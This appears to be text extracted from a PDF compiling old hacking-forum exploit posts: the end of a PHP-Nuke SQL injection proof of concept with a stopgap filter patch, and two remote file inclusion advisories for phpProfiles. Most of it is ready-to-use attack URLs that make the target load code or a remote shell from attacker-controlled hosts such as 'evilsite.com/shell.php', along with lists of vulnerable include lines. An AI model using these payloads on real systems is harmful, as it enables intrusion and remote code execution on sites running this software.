// Whit this PoC code i get the md5 hash of the first admin God of the nuke_authors table.. I recommend to download the PHP Nuke 8.0 version in the next days.... it is not // free at the
Trang 1// Whit this PoC code i get the md5 hash of the first admin (God) of the
nuke_authors table
// - How to fix it? More information?
// -
// You can found a patch on http://www.neosecurityteam.net/foro/
// Also, you can modify the line 143 of mainfile.php, adding one more protection like:
// ==[ mainfile.php old line (143) ]==========================
// [ ]
// if (stripos_clone($postString,'%20union%20') OR
stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR
stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+')) {
// }
// [ ]
// ==[ end mainfile.php ]=====================================
// ==[ mainfile.php new line (143) ]==========================
// [ ]
// if (stripos_clone($postString,'%20union%20') OR
stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR
stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+') OR stripos_clone($postString_64, // '*/UNION ') OR stripos_clone($postString_64, ' UNION/*')) {
// }
// [ ]
// ==[ end mainfile.php ]=====================================
// That's a momentary solution to the problem I recommend to download the PHP Nuke 8.0 version in the next days it is not
// free at the moment
// - References
Trang 2// -
// http://www.neosecurityteam.net/index.php?action=advisories&id=27
// - Credits
// -
// Anti SQL Injection protection bypass by Paisterist -> paisterist.nst [at] gmail [dot] com
// SQL Injection vulnerability in Encyclopedia module discovered by Paisterist -> paisterist.nst [at] gmail [dot] com
// Proof of Concept exploit by Paisterist -> paisterist.nst [at] gmail [dot] com
// [N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/
// - Greets
// -
// HaCkZaTaN
// K4P0
// Daemon21
// Link
// 0m3gA_x
// LINUX
// nitrous
// m0rpheus
// nikyt0x
// KingMetal
// Knightmare
// Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!
?>
Black_hat_cr(HCE)
phpProfiles 2.1 Beta Multiple Remote File Include Vulnerabilities
phpProfiles 2.1 Beta Multiple Remote File Include Vulnerabilities
PHP Code:
#======================================================
============
Trang 3# phpProfiles (RFI)
#======================================================
============
# Info:-
#
# Scripts: phpProfiles
# download : http://sourceforge.net/project/showfiles.php?group_id=176310
# Version : v.2.1 Beta
# Dork & vuln : download scripts and think :)
#
#======================================================
============
#Exploit :
#
#http://localhost/path/users/include/body.inc.php?reqpath=http://EvElCoDe.t xt?
#http://localhost/path/users/include/body_blog.inc.php?reqpath=http://EvElC oDe.txt?
#http://localhost/path/users/include/upload_ht.inc.php?usrinc=http://EvElCoD e.txt?
#
#======================================================
============
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#
#XP10_hackEr Team >> www.xp10.com
#SpeciaL PoweR SecuritY TeaM >> www.specialpower.org
#
#Greetz to : | abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL |
# | ThE-WoLf-KsA | mohandko | fooooz | maVen | fucker_net |
# | metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota |
# | Jean | CoDeR |
#
# Thanks >> /str0ke & www.milw0rm.com & www.google.com
=======================================================
============
# milw0rm.com [2006-10-30]
Trang 4sexyvirus(HCE)
phpProfiles <= 3.1.2b Multiple Remote File Include Vulnerabilities
Code:
+ -
+ phpProfiles <= 3.1.2b Multiple Remote File Include Vulnerabilities
+ -
+ Affected Software : phpProfiles <= 3.1.2b
+ Download :
http://downloads.sourceforge.net/phpprofiles/phpProfiles_3_1_2.zip
+ Description : "phpProfiles allows you to offer visitors their very own URL
on your web site simply by registering"
+ Class : Remote File Inclusion
+ Risk : High (Remote File Execution)
+ Found By : nuffsaid <nuffsaid[at]newbslove.us>
+ -
+ Details:
+ phpProfiles has several scripts which do not initialize variables before using them to
+ include files, assuming register_globals = on, we can initialize any one of the variables
+ in a query string and include a remote file of our choice
+
+ Vulnerable Code:
+ include/remove_pic.inc.php line(s) 11: include("$scriptpath/redirect.php");
+ include/body_admin.inc.php line(s) 03: <p><?include("$menu");?></p>
+ include/account.inc.php, line(s) 09: include("$incpath/footer.inc.php");
+ include/index.inc.php, line(s) 05: include("$incpath/adminerr.inc.php");
+ see below for a list of files affected
+
+ Proof Of Concept:
+ http://[target]/[path]/include/body.inc.php?menu=http://evilsite.com/shell.php + http://[target]/[path]/include/index.inc.php?incpath=http://evilsite.com/shell.php?
Trang 5+
http://[target]/[path]/include/account.inc.php?action=update&incpath=http://evilsit e.com/shell.php?
+
http://[target]/[path]/include/admin_newcomm.inc.php?action=create&incpath=htt p://evilsite.com/shell.php?
+
http://[target]/[path]/include/header_admin.inc.php?incpath=http://evilsite.com/she ll.php?
+
http://[target]/[path]/include/header.inc.php?incpath=http://evilsite.com/shell.php? +
http://[target]/[path]/include/friends.inc.php?action=invite&incpath=http://evilsite com/shell.php?
+
http://[target]/[path]/include/menu_u.inc.php?incpath=http://evilsite.com/shell.php
?
+
http://[target]/[path]/include/notify.inc.php?action=sendit&incpath=http://evilsite.c om/shell.php?
+ http://[target]/[path]/include/body.inc.php?incpath=http://evilsite.com/shell.php? +
http://[target]/[path]/include/body_admin.inc.php?menu=http://evilsite.com/shell.p
hp
+
http://[target]/[path]/include/body_admin.inc.php?incpath=http://evilsite.com/shell php?
+
http://[target]/[path]/include/commrecc.inc.php?action=recommend&incpath=http: //evilsite.com/shell.php?
+
http://[target]/[path]/include/do_reg.inc.php?incpath=http://evilsite.com/shell.php? +
http://[target]/[path]/include/comm_post.inc.php?action=post&incpath=http://evilsi te.com/shell.php?
+
http://[target]/[path]/include/menu_v.inc.php?incpath=http://evilsite.com/shell.php
?